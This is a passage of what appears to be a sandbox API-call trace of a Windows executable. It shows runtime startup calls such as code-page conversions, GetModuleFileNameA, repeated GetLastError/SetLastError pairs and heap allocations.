(in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0068.603] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0068.604] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0068.604] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0068.604] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ]#hö\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0068.604] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x418208, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe")) returned 0x62 [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.604] GetLastError () returned 0x0 [0068.604] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.605] GetLastError () returned 0x0 [0068.605] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.606] SetLastError (dwErrCode=0x0) [0068.606] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.607] SetLastError (dwErrCode=0x0) [0068.607] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.608] SetLastError (dwErrCode=0x0) [0068.608] GetLastError () returned 0x0 [0068.609] SetLastError (dwErrCode=0x0) [0068.609] GetLastError () returned 0x0 [0068.609] SetLastError (dwErrCode=0x0) [0068.609] GetLastError () returned 0x0 [0068.609] SetLastError (dwErrCode=0x0) [0068.609] GetLastError () returned 0x0 [0068.609] SetLastError (dwErrCode=0x0) [0068.609] GetLastError () returned 0x0 [0068.609] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.610] SetLastError (dwErrCode=0x0) [0068.610] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.611] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.611] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.611] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.611] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.611] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.611] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.611] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.611] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.611] GetLastError () returned 0x0 [0068.611] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.612] GetLastError () returned 0x0 [0068.612] SetLastError (dwErrCode=0x0) [0068.613] GetLastError () returned 0x0 [0068.613] SetLastError (dwErrCode=0x0) [0068.613] GetLastError () returned 0x0 [0068.613] SetLastError (dwErrCode=0x0) [0068.613] GetLastError () returned 0x0 [0068.613] SetLastError (dwErrCode=0x0) [0068.613] GetLastError () returned 0x0 [0068.613] SetLastError (dwErrCode=0x0) [0068.613] GetLastError () returned 0x0 [0068.613] SetLastError (dwErrCode=0x0) [0068.613] GetLastError () returned 0x0 [0068.613] SetLastError (dwErrCode=0x0) [0068.613] GetLastError () returned 0x0 [0068.613] SetLastError (dwErrCode=0x0) [0068.613] GetLastError () returned 0x0 [0068.613] SetLastError (dwErrCode=0x0) [0068.613] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6b) returned 0x691710 [0068.614] GetLastError () returned 0x0 [0068.614] SetLastError (dwErrCode=0x0) [0068.614] GetLastError () returned 0x0 [0068.615] SetLastError (dwErrCode=0x0) [0068.615] GetLastError () returned 0x0 [0068.624] SetLastError (dwErrCode=0x0) [0068.624] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.625] SetLastError (dwErrCode=0x0) [0068.625] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.626] SetLastError (dwErrCode=0x0) [0068.626] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.627] SetLastError (dwErrCode=0x0) [0068.627] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.628] SetLastError (dwErrCode=0x0) [0068.628] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.629] SetLastError (dwErrCode=0x0) [0068.629] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.630] GetLastError () returned 0x0 [0068.630] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.631] SetLastError (dwErrCode=0x0) [0068.631] GetLastError () returned 0x0 [0068.632] SetLastError (dwErrCode=0x0) [0068.632] GetLastError () returned 0x0 [0068.632] SetLastError (dwErrCode=0x0) [0068.632] GetLastError () returned 0x0 [0068.632] SetLastError (dwErrCode=0x0) [0068.632] GetLastError () returned 0x0 [0068.632] SetLastError (dwErrCode=0x0) [0068.632] GetLastError () returned 0x0 [0068.632] SetLastError (dwErrCode=0x0) [0068.632] GetLastError () returned 0x0 [0068.632] SetLastError (dwErrCode=0x0) [0068.632] GetLastError () returned 0x0 [0068.632] SetLastError (dwErrCode=0x0) [0068.632] GetLastError () returned 0x0 [0068.632] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.633] SetLastError (dwErrCode=0x0) [0068.633] GetLastError () returned 0x0 [0068.634] SetLastError (dwErrCode=0x0) [0068.634] GetLastError () returned 0x0 [0068.634] SetLastError (dwErrCode=0x0) [0068.634] GetLastError () returned 0x0 [0068.634] SetLastError (dwErrCode=0x0) [0068.634] GetLastError () returned 0x0 [0068.634] SetLastError (dwErrCode=0x0) [0068.634] GetLastError () returned 0x0 [0068.634] SetLastError (dwErrCode=0x0) [0068.634] GetLastError () returned 0x0 [0068.634] SetLastError (dwErrCode=0x0) [0068.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x90) returned 0x691788 [0068.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1f) returned 0x691820 [0068.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x2e) returned 0x691848 [0068.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x37) returned 0x691880 [0068.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x3c) returned 0x6918c0 [0068.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x31) returned 0x691908 [0068.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x14) returned 0x691948 [0068.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x24) returned 0x691968 [0068.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xd) returned 0x691998 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1d) returned 0x6919b0 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x31) returned 0x6919d8 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x15) returned 0x691a18 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x17) returned 0x691a38 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe) returned 0x691a58 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x69) returned 0x691a70 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x3e) returned 0x691ae8 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1b) returned 0x691b30 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1d) returned 0x691b58 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x48) returned 0x691b80 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x12) returned 0x691bd0 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x18) returned 0x691bf0 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1b) returned 0x691c10 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x24) returned 0x691c38 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x29) returned 0x691c68 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1e) returned 0x691ca0 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x6b) returned 0x691cc8 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x17) returned 0x691d40 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xf) returned 0x691d60 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x16) returned 0x691d78 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x2a) returned 0x691d98 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x29) returned 0x691dd0 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x12) returned 0x691e08 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x21) returned 0x691e28 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x16) returned 0x691e58 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x22) returned 0x691e78 [0068.635] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x12) returned 0x691ea8 [0068.635] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x690fd0 | out: hHeap=0x690000) returned 1 [0068.636] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x800) returned 0x691ec8 [0068.637] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x80) returned 0x690fd0 [0068.637] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x403935) returned 0x0 [0068.638] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x690fd0) returned 0x80 [0068.638] GetLastError () returned 0x0 [0068.638] SetLastError (dwErrCode=0x0) [0068.638] GetLastError () returned 0x0 [0068.638] SetLastError (dwErrCode=0x0) [0068.638] GetLastError () returned 0x0 [0068.638] SetLastError (dwErrCode=0x0) [0068.638] GetLastError () returned 0x0 [0068.638] SetLastError (dwErrCode=0x0) [0068.638] GetLastError () returned 0x0 [0068.638] SetLastError (dwErrCode=0x0) [0068.638] GetLastError () returned 0x0 [0068.639] SetLastError (dwErrCode=0x0) [0068.639] 